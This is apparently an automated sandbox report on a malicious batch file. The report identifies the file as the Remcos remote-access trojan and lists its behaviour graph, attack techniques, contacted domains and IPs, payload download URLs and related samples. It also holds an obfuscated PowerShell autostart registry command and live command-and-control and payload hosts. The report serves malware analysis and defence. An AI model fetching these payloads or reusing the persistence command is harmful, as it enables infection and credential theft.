                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1535955 Sample: SKU_0001710-1-2024-SX-3762.bat Startdate: 17/10/2024 Architecture: WINDOWS Score: 100 42 renajazinw.duckdns.org 2->42 44 geoplugin.net 2->44 46 artieri.ro 2->46 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 70 8 other signatures 2->70 9 powershell.exe 18 2->9         started        12 cmd.exe 1 2->12         started        signatures3 68 Uses dynamic DNS services 42->68 process4 signatures5 72 Early bird code injection technique detected 9->72 74 Writes to foreign memory regions 9->74 76 Found suspicious powershell code related to unpacking or dynamic code loading 9->76 78 Queues an APC in another process (thread injection) 9->78 14 msiexec.exe 5 16 9->14         started        19 conhost.exe 9->19         started        80 Suspicious powershell command line found 12->80 21 powershell.exe 14 22 12->21         started        23 conhost.exe 12->23         started        process6 dnsIp7 48 renajazinw.duckdns.org 193.187.91.216, 53848, 62802, 62817 OBE-EUROPEObenetworkEuropeSE Sweden 14->48 50 geoplugin.net 178.237.33.50, 62818, 80 ATOM86-ASATOM86NL Netherlands 14->50 40 C:\ProgramData\remcos\logs.dat, data 14->40 dropped 54 Detected Remcos RAT 14->54 56 Tries to steal Mail credentials (via file registry) 14->56 58 Maps a DLL or memory area into another process 14->58 25 msiexec.exe 2 14->25         started        28 msiexec.exe 1 14->28         started        30 cmd.exe 1 14->30         started        34 2 other processes 14->34 52 artieri.ro 89.44.138.129, 443, 49730, 49731 GTSCEGTSCentralEuropeAntelGermanyCZ Romania 21->52 60 Found suspicious powershell code related to unpacking or dynamic code loading 21->60 32 conhost.exe 21->32         started        file8 signatures9 process10 signatures11 82 Tries to harvest and steal browser information (history, passwords, etc) 25->82 36 conhost.exe 30->36         started        38 reg.exe 1 1 30->38         started        process12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                SKU_0001710-1-2024-SX-3762.bat5%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.imvu.comr0%URL Reputationsafe
                https://contoso.com/License0%URL Reputationsafe
                https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                https://aka.ms/pscore6lB0%URL Reputationsafe
                https://contoso.com/0%URL Reputationsafe
                https://nuget.org/nuget.exe0%URL Reputationsafe
                https://login.yahoo.com/config/login0%URL Reputationsafe
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%URL Reputationsafe
                http://nuget.org/NuGet.exe0%URL Reputationsafe
                http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                https://go.micro0%URL Reputationsafe
                http://www.imvu.com0%URL Reputationsafe
                https://contoso.com/Icon0%URL Reputationsafe
                http://geoplugin.net/json.gp0%URL Reputationsafe
                http://crl.micro0%URL Reputationsafe
                https://aka.ms/pscore680%URL Reputationsafe
                http://www.ebuddy.com0%URL Reputationsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                artieri.ro
                89.44.138.129
                truefalse
                  unknown
                  geoplugin.net
                  178.237.33.50
                  truefalse
                    unknown
                    renajazinw.duckdns.org
                    193.187.91.216
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      http://artieri.ro/g/Skifferdkkers.pcxfalse
                        unknown
                        http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binfalse
                          unknown
                          renajazinw.duckdns.orgtrue
                            unknown
                            http://geoplugin.net/json.gpfalse
                            • URL Reputation: safe
                            unknown
                            https://artieri.ro/g/MihrGCaVzvslPdUujzk140.binfalse
                              unknown
                              https://artieri.ro/g/Skifferdkkers.pcxfalse
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.imvu.comrmsiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv68C0.tmp.13.drfalse
                                  unknown
                                  http://www.imvu.comtamsiexec.exe, 00000010.00000003.2409759123.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409782092.00000000036BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv68C0.tmp.13.drfalse
                                      unknown
                                      https://aefd.nelreports.net/api/report?cat=bingthbhv68C0.tmp.13.drfalse
                                        unknown
                                        https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv68C0.tmp.13.drfalse
                                          unknown
                                          https://contoso.com/Licensepowershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.nirsoft.netmsiexec.exe, 0000000D.00000002.2427807461.0000000002A73000.00000004.00000010.00020000.00000000.sdmpfalse
                                            unknown
                                            https://aefd.nelreports.net/api/report?cat=bingaotakbhv68C0.tmp.13.drfalse
                                              unknown
                                              https://deff.nelreports.net/api/report?cat=msnbhv68C0.tmp.13.drfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv68C0.tmp.13.drfalse
                                                unknown
                                                https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv68C0.tmp.13.drfalse
                                                  unknown
                                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv68C0.tmp.13.drfalse
                                                    unknown
                                                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 00000009.00000002.3056080933.0000000021F20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      unknown
                                                      https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv68C0.tmp.13.drfalse
                                                        unknown
                                                        https://www.google.commsiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          unknown
                                                          http://geoplugin.net/json.gpCmsiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv68C0.tmp.13.drfalse
                                                              unknown
                                                              http://geoplugin.net/json.gpHmsiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://artieri.ro/msiexec.exe, 00000009.00000002.3042211181.000000000624A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042211181.0000000006273000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://aka.ms/pscore6lBpowershell.exe, 00000006.00000002.2129665169.0000000004991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://maps.windows.com/windows-app-web-linkbhv68C0.tmp.13.drfalse
                                                                    unknown
                                                                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv68C0.tmp.13.drfalse
                                                                      unknown
                                                                      http://geoplugin.net/json.gpPmsiexec.exe, 00000009.00000003.2429498672.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430114623.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000002.3042429182.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2430472905.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2364773419.000000000632E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2402846377.000000000631E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000009.00000003.2406404787.0000000006327000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://contoso.com/powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://geoplugin.net/json.gpxemsiexec.exe, 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv68C0.tmp.13.drfalse
                                                                            unknown
                                                                            https://login.yahoo.com/config/loginmsiexec.exefalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            http://www.nirsoft.net/msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                              unknown
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1943655705.00000267B0141000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2129665169.0000000004991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv68C0.tmp.13.drfalse
                                                                                unknown
                                                                                http://geoplugin.net/json.gp_msiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv68C0.tmp.13.drfalse
                                                                                    unknown
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv68C0.tmp.13.drfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.office.com/bhv68C0.tmp.13.drfalse
                                                                                      unknown
                                                                                      http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1974162438.00000267C01B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv68C0.tmp.13.drfalse
                                                                                        unknown
                                                                                        https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv68C0.tmp.13.drfalse
                                                                                          unknown
                                                                                          https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv68C0.tmp.13.drfalse
                                                                                            unknown
                                                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv68C0.tmp.13.drfalse
                                                                                              unknown
                                                                                              http://geoplugin.net/json.gpkmsiexec.exe, 00000009.00000003.2364806735.00000000062D4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://go.micropowershell.exe, 00000002.00000002.1943655705.00000267B0D5B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv68C0.tmp.13.drfalse
                                                                                                    unknown
                                                                                                    http://www.imvu.commsiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409759123.00000000036BD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2409782092.00000000036BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    https://aefd.nelreports.net/api/report?cat=wsbbhv68C0.tmp.13.drfalse
                                                                                                      unknown
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000006.00000002.2146151980.00000000059FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv68C0.tmp.13.drfalse
                                                                                                        unknown
                                                                                                        https://artieri.ropowershell.exe, 00000002.00000002.1943655705.00000267B05C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          http://geoplugin.net/json.gpxe2msiexec.exe, 00000009.00000002.3042211181.00000000062AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv68C0.tmp.13.drfalse
                                                                                                                unknown
                                                                                                                https://artieri.ro/g/MihrGCaVzvslPdUujzk140.bin%msiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  http://crl.micropowershell.exe, 00000006.00000002.2153152269.00000000073E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  unknown
                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingaotbhv68C0.tmp.13.drfalse
                                                                                                                    unknown
                                                                                                                    https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-aebhv68C0.tmp.13.drfalse
                                                                                                                      unknown
                                                                                                                      http://artieri.ropowershell.exe, 00000002.00000002.1943655705.00000267B1EF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B036C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943655705.00000267B1EDB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7bhv68C0.tmp.13.drfalse
                                                                                                                          unknown
                                                                                                                          http://artieri.ro/g/Skifferdkkers.pcxXRpowershell.exe, 00000006.00000002.2129665169.0000000004AE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binTmsiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://artieri.ro/g/MihrGCaVzvslPdUujzk140.binUmsiexec.exe, 00000009.00000002.3042211181.000000000628E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFDbhv68C0.tmp.13.drfalse
                                                                                                                                  unknown
                                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingrmsbhv68C0.tmp.13.drfalse
                                                                                                                                    unknown
                                                                                                                                    https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993bhv68C0.tmp.13.drfalse
                                                                                                                                      unknown
                                                                                                                                      https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                                                                                                                        unknown
                                                                                                                                        https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5bhv68C0.tmp.13.drfalse
                                                                                                                                          unknown
                                                                                                                                          https://aka.ms/pscore68powershell.exe, 00000002.00000002.1943655705.00000267B0141000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3bhv68C0.tmp.13.drfalse
                                                                                                                                            unknown
                                                                                                                                            https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135bhv68C0.tmp.13.drfalse
                                                                                                                                              unknown
                                                                                                                                              https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59bhv68C0.tmp.13.drfalse
                                                                                                                                                unknown
                                                                                                                                                http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000010.00000002.2410026590.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                unknown
                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs
                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                89.44.138.129
                                                                                                                                                artieri.roRomania
                                                                                                                                                5588GTSCEGTSCentralEuropeAntelGermanyCZfalse
                                                                                                                                                178.237.33.50
                                                                                                                                                geoplugin.netNetherlands
                                                                                                                                                8455ATOM86-ASATOM86NLfalse
                                                                                                                                                193.187.91.216
                                                                                                                                                renajazinw.duckdns.orgSweden
                                                                                                                                                197595OBE-EUROPEObenetworkEuropeSEtrue
                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                Analysis ID:1535955
                                                                                                                                                Start date and time:2024-10-17 14:17:06 +02:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 8m 31s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:18
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:SKU_0001710-1-2024-SX-3762.bat
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winBAT@22/13@3/3
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 66.7%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 97%
                                                                                                                                                • Number of executed functions: 168
                                                                                                                                                • Number of non-executed functions: 269
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .bat
                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, 7.4.8.4.4.3.1.4.0.0.0.0.0.0.0.0.0.0.0.a.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 3980 because it is empty
                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 6112 because it is empty
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                • VT rate limit hit for: SKU_0001710-1-2024-SX-3762.bat
                                                                                                                                                TimeTypeDescription
                                                                                                                                                08:18:14API Interceptor85x Sleep call for process: powershell.exe modified
                                                                                                                                                08:19:36API Interceptor143077x Sleep call for process: msiexec.exe modified
                                                                                                                                                13:18:53AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hvidtning81 %Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)
                                                                                                                                                13:19:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hvidtning81 %Greenlets% -windowstyle 1 $Idlers=(gp -Path 'HKCU:\Software\Europiser153\').cricetidae;%Greenlets% ($Idlers)
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                178.237.33.50SWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                New Order.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                MARSS-FILTRY_ZW015010024.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                • geoplugin.net/json.gp
                                                                                                                                                193.187.91.216SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  geoplugin.netSWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  New Order.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  MARSS-FILTRY_ZW015010024.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  OBE-EUROPEObenetworkEuropeSEXClient.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                  • 194.32.149.14
                                                                                                                                                  bot_library.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.182.111.131
                                                                                                                                                  z2PO20240815.pdf.lnkGet hashmaliciousXWormBrowse
                                                                                                                                                  • 193.187.91.208
                                                                                                                                                  SecuriteInfo.com.Win32.PWSX-gen.24212.14364.exeGet hashmaliciousRemcos, PureLog StealerBrowse
                                                                                                                                                  • 193.187.91.216
                                                                                                                                                  https://www.canva.com/design/DAGLxvJi_b4/I2I9hVBC94poYJRY8neUTg/view?utm_content=DAGLxvJi_b4&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                  • 194.32.144.119
                                                                                                                                                  REV-New Order 20240717^^^^^^^^^^^^^^^^^^.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                  • 193.187.91.208
                                                                                                                                                  REV-New Order 20240717.pif.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 193.187.91.124
                                                                                                                                                  SecuriteInfo.com.AutoIt.Injector-JY.190.10007.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  • 193.182.111.41
                                                                                                                                                  906o5yr1NE.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Stealc, XmrigBrowse
                                                                                                                                                  • 45.15.16.116
                                                                                                                                                  Zq8C82dzXG.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                  • 185.157.160.214
                                                                                                                                                  ATOM86-ASATOM86NLSWIFT COPY.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  Proof_of_Payment 08637.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  New Order.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  PO OCTOBER 2024 _ PDF.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  17290972859113f7995b23df55ec0b2b7ae16822e0e59b575d2cfb603e79ed2793266980db734.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  1729097285e3762b77689e8a42c1dbcef03f73271c1f3d5846d063e03830c041710b98532d536.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  ge5AHaHgsn.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  YysMIxESRE.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  MARSS-FILTRY_ZW015010024.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 178.237.33.50
                                                                                                                                                  GTSCEGTSCentralEuropeAntelGermanyCZspc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 94.42.225.51
                                                                                                                                                  powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                  • 178.183.111.126
